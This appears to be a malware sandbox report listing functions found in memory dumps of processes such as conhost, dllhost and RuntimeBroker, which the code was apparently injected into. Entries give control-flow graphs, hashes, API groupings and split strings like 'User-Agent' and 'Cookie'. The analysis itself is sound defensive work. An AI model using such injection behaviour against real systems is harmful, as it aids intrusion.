                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: acaf790e11c60cba8a293411a6431baf221f9d6cbfbb05ff914238914326911b
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: BF31D67201024CBFEB017B709D46BBA3B6CEF91350F004165BE85DA0A3EA7549948BB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00880811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000001E.00000002.2966843068.0000000000880000.00000040.00000001.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_30_2_880000_conhost.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 880e9aabe061995b8033cec9ddf34236fde6215fc8b9e8af3826ea7dc37c58af
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: A031D4724002086FEF417F749D4AABA3BACFF11300F000165FD85DA0A6EA7449A9CFB6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00980811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000001F.00000002.2966847993.0000000000980000.00000040.00000001.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_31_2_980000_dllhost.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 05d2ec8a17d838d95e91d8bb6291b1c254e15e4d3c82129372bb541a104e5f8d
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: 6231E6720002056FEF417F709D46BBA3BACEF91300F000165BD85DA2A2EA7549A9CBB6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00A20811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000021.00000002.2504300821.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_33_2_a20000_RuntimeBroker.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 8d758f3a916c03f6e5df19f9fc3d763be8a9d881da75f68633e99bf1337d5061
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: F631E6724002247FEB017B74AE86EBA3BACEF11300F440175BD85DA0A7EA7449A58AB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00060811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000022.00000002.2967398986.0000000000060000.00000040.00000001.00020000.00000000.sdmp, Offset: 00060000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_34_2_60000_RuntimeBroker.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 7829851cbd399c4a7dc69e4cc2518204601d444ef535abd62bd0664f49c99fbc
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: 4131C4724502046FEB01BB709D8AAFB3BAEEF11310F044166BD85DA0A7EE744D658BB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 0307093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 307093e-307095f call 3070cc4 call 30714bc call 3073cc0 8 3070967-3070989 0->8 10 3070af1-3070af2 8->10 11 307098f-30709d2 call 30709d9 8->11 15 30709d4-30709d5 11->15 16 3070a3d-3070a80 11->16 17 30709d7-30709e8 call 3073653 15->17 18 3070a3c 15->18 21 3070a82-3070aae 16->21 22 3070aec call 3070af3 16->22 17->22 29 30709ee-3070a10 17->29 18->16 21->22 27 3070ab0-3070abc 21->27 22->10 31 3070ac1-3070ae5 27->31 29->22 33 3070a16-3070a3b 29->33 31->10 37 3070ae7-3070aea 31->37 33->18 33->22 37->22 37->31
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000023.00000002.3002373441.0000000003070000.00000040.00000001.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_35_2_3070000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction ID: 86a9fefce4934b5a333cffb6db5292588555923d7cee170db6eb40ea3dbc61d4
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction Fuzzy Hash: 24518331A45354AFEB229F20CC85B9A77FCAF04744F0802D5BA49FE0D6DAB09594CB69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 030714BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 38 30714bc-30714df call 30714de 41 3071502-3071590 call 3071345 * 6 38->41 42 30714e1-3071500 call 3070c9c 38->42 42->41
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000023.00000002.3002373441.0000000003070000.00000040.00000001.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_35_2_3070000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
                                                                                                                                                                          • Instruction ID: 017be806817093a75857458c5232b068edda4fd13acc0b37dc88a390a8effc62
                                                                                                                                                                          • Opcode Fuzzy Hash: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
                                                                                                                                                                          • Instruction Fuzzy Hash: 21210C728056149EDB07EF60C9C8CE673ECEF80604F45096B9D89EF089FA709154CAEA
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 03071345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 58 3071345-3071352 59 30713eb-30713ec 58->59 60 3071358-307135e 58->60 60->59 61 3071364-307137a 60->61 61->59 63 307137c-307138f 61->63 65 3071391-3071398 63->65 66 307139b-30713ab call 3070e7c 65->66 69 30713ad-30713e2 66->69 69->59
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000023.00000002.3002373441.0000000003070000.00000040.00000001.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_35_2_3070000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: 3a0c3ecd972323767d781896da44f67a459339497b0295846b38ba0d6d4338d9
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: 6621AC31A05216AFDB11DEB8C888B9DBBF5AF04300F098225F955BB6D4DB70A900CB98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 030714DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 70 30714de-3071590 call 3073653 call 3070c9c call 3071345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000023.00000002.3002373441.0000000003070000.00000040.00000001.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_35_2_3070000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
                                                                                                                                                                          • Instruction ID: 0fe5d329beae997d042294d1ae1f77621b18a5665ba787c63f8b4f0693f02e84
                                                                                                                                                                          • Opcode Fuzzy Hash: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
                                                                                                                                                                          • Instruction Fuzzy Hash: BC1189768056149EEF03EF60C5C8CEA73FCEE80604B4509AA9D85EF449FE709154CAE9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 03073F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000023.00000002.3002373441.0000000003070000.00000040.00000001.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_35_2_3070000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction ID: ecb83dd5a496519179beab78a50a14464ce1c7e8e3415d1f6b2695ba08c648a6
                                                                                                                                                                          • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction Fuzzy Hash: 59F08C3CD8A340AAFF40BBB08C4979D32B8AF80385F0404D0AA89AD0D0CE308551AEF8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 03074675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 135 3074675-307468d call 3073a1c 138 307468f-3074698 call 3073a6e 135->138 139 307469d-30746cd 135->139 138->139 142 30747e7-30747ec 139->142 143 30746d3-30746f5 139->143 143->142 145 30746fb-3074720 143->145 147 3074722-3074737 145->147 148 3074738-307475a 145->148 147->148 150 30747bf-30747c9 148->150 151 307475c-307477e 148->151 152 30747e0-30747e5 150->152 153 30747cb-30747dd call 3073673 150->153 151->150 157 3074780-30747a2 151->157 152->142 153->152 157->150 159 30747a4-30747bc 157->159 159->150
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000023.00000002.3002373441.0000000003070000.00000040.00000001.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_35_2_3070000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction ID: 233fa0e0f9852c3c6952d79b4540f11fc55acb3374298afafe964f87364d901d
                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction Fuzzy Hash: 504163B6900208BFEF129F65CC48BDEBFF9EF84704F1540A9EA44AA254D734D650CB98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 03074674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 110 3074674-3074680 111 307468b-307468d 110->111 112 3074686 call 3073a1c 110->112 113 307468f-3074698 call 3073a6e 111->113 114 307469d-30746cd 111->114 112->111 113->114 117 30747e7-30747ec 114->117 118 30746d3-30746f5 114->118 118->117 120 30746fb-3074720 118->120 122 3074722-3074737 120->122 123 3074738-307475a 120->123 122->123 125 30747bf-30747c9 123->125 126 307475c-307477e 123->126 127 30747e0-30747e5 125->127 128 30747cb-30747dd call 3073673 125->128 126->125 132 3074780-30747a2 126->132 127->117 128->127 132->125 134 30747a4-30747bc 132->134 134->125
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000023.00000002.3002373441.0000000003070000.00000040.00000001.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_35_2_3070000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction ID: 87063ca7f03c968daa3ededf72a38c46cb6e7b2da7de9e3cb1b1568f7327516e
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction Fuzzy Hash: EE4153B6901208BFEF129F65CC44BDEBBF9EF84704F154099EA44AA254D7349640DB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 02CE093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 2ce093e-2ce095f call 2ce0cc4 call 2ce14bc call 2ce3cc0 8 2ce0967-2ce0989 0->8 10 2ce098f-2ce09d2 call 2ce09d9 8->10 11 2ce0af1-2ce0af2 8->11 15 2ce0a3d-2ce0a76 10->15 16 2ce09d4-2ce09d5 10->16 17 2ce0a7e-2ce0a80 15->17 18 2ce0a3c 16->18 19 2ce09d7-2ce09e8 call 2ce3653 16->19 20 2ce0aec call 2ce0af3 17->20 21 2ce0a82-2ce0aae 17->21 18->15 19->20 30 2ce09ee-2ce0a10 19->30 20->11 21->20 27 2ce0ab0-2ce0abc 21->27 31 2ce0ac1-2ce0ae5 27->31 30->20 34 2ce0a16-2ce0a3b 30->34 31->11 37 2ce0ae7-2ce0aea 31->37 34->20 38 2ce0a41-2ce0a76 34->38 37->20 37->31 38->17
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000024.00000002.2995653365.0000000002CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2ce0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction ID: ae50c36aab4f5a171fe8dbe0f9d80606aa5399d86f115cb0f5a5473561e3e639
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction Fuzzy Hash: CC5180316442549FEF229F20CC85B9A77BCEF44744F0401D9BA4AFE0D6DBB09694CAA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02CE14BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 39 2ce14bc-2ce1590 call 2ce14de call 2ce0c9c call 2ce1345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000024.00000002.2995653365.0000000002CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2ce0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4e971aff2dee82d23a3358c9d971b96922ba5f2b56971bbf18b19d5fda69c74c
                                                                                                                                                                          • Instruction ID: 965a6c7d897dd9df6fe59c0f754f203ef6fdd9d8aaaa276a14499ab3faf1b773
                                                                                                                                                                          • Opcode Fuzzy Hash: 4e971aff2dee82d23a3358c9d971b96922ba5f2b56971bbf18b19d5fda69c74c
                                                                                                                                                                          • Instruction Fuzzy Hash: 4621EEB24046149EDF03AF60C9C9DA673ECEF40704F49096A9D8AEF049FAB49554CEE6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02CE1345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 58 2ce1345-2ce1352 59 2ce13eb-2ce13ec 58->59 60 2ce1358-2ce135e 58->60 60->59 61 2ce1364-2ce137a 60->61 61->59 63 2ce137c-2ce138f 61->63 65 2ce1391-2ce1398 63->65 66 2ce139b-2ce13ab call 2ce0e7c 65->66 69 2ce13ad-2ce13e2 66->69 69->59
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000024.00000002.2995653365.0000000002CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2ce0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: 316af92cff46ee6346745f2e2a7fea43905a2b6ca7912d35c35f56d9927a5098
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: 7721C031904316AFDF119F78C844B5DBBB5AF44300F094225FD59BB594D770E910CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02CE14DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 70 2ce14de-2ce1590 call 2ce3653 call 2ce0c9c call 2ce1345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000024.00000002.2995653365.0000000002CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2ce0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: dd4bdbd2d3ac98c154407d02b891d2f62a68255919f7b6f6d8897c53184077a6
                                                                                                                                                                          • Instruction ID: b439095194dc05d1f5c738cb6e4e7554d49f063a5c19dffec498dfe1073bf0ab
                                                                                                                                                                          • Opcode Fuzzy Hash: dd4bdbd2d3ac98c154407d02b891d2f62a68255919f7b6f6d8897c53184077a6
                                                                                                                                                                          • Instruction Fuzzy Hash: 7E118FB24045549EEF03AF60C5C8CAA73ECEE40704B49096A9D8AEF449FE709554DEE5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02CE3F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 88 2ce3f0d-2ce3f29 call 2ce3653 call 2ce379f 93 2ce3f3b-2ce3f66 call 2ce3f78 * 3 88->93 94 2ce3f2b-2ce3f39 call 2ce401b 88->94 107 2ce3f71 93->107 102 2ce3f76-2ce3f77 94->102 107->102 108 2ce3f71 call 2ce3f78 107->108 108->102
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000024.00000002.2995653365.0000000002CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2ce0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction ID: 2048a36e1943d2e02837744e908cbb0f509e5ff452fafdf9f67c27751f414615
                                                                                                                                                                          • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction Fuzzy Hash: 05F01C705A83C0AAEF403BB08C4E67936B9AF40705F0405D1EA8BAF0E4DE71A550AE76
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 02CE4674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 109 2ce4674-2ce468d call 2ce3a1c 112 2ce468f-2ce4698 call 2ce3a6e 109->112 113 2ce469d-2ce46cd 109->113 112->113 116 2ce47e7-2ce47ec 113->116 117 2ce46d3-2ce46f5 113->117 117->116 119 2ce46fb-2ce4720 117->119 121 2ce4738-2ce475a 119->121 122 2ce4722-2ce4737 119->122 124 2ce47bf-2ce47c9 121->124 125 2ce475c-2ce477e 121->125 122->121 126 2ce47cb-2ce47dd call 2ce3673 124->126 127 2ce47e0-2ce47e5 124->127 125->124 130 2ce4780-2ce47a2 125->130 126->127 127->116 130->124 133 2ce47a4-2ce47bc 130->133 133->124
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000024.00000002.2995653365.0000000002CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2ce0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction ID: 5376436ed26b5be65a00d8a77ec8e31f47cb47533dde2da6ebc82ec47530acf9
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction Fuzzy Hash: E74163B6500208BFEF229FA5CC44BEEBBBAFF80704F154059EA45AB254D7309640CF94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02CE4675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 134 2ce4675-2ce4680 135 2ce468b-2ce468d 134->135 136 2ce4686 call 2ce3a1c 134->136 137 2ce468f-2ce4698 call 2ce3a6e 135->137 138 2ce469d-2ce46cd 135->138 136->135 137->138 141 2ce47e7-2ce47ec 138->141 142 2ce46d3-2ce46f5 138->142 142->141 144 2ce46fb-2ce4720 142->144 146 2ce4738-2ce475a 144->146 147 2ce4722-2ce4737 144->147 149 2ce47bf-2ce47c9 146->149 150 2ce475c-2ce477e 146->150 147->146 151 2ce47cb-2ce47dd call 2ce3673 149->151 152 2ce47e0-2ce47e5 149->152 150->149 155 2ce4780-2ce47a2 150->155 151->152 152->141 155->149 158 2ce47a4-2ce47bc 155->158 158->149
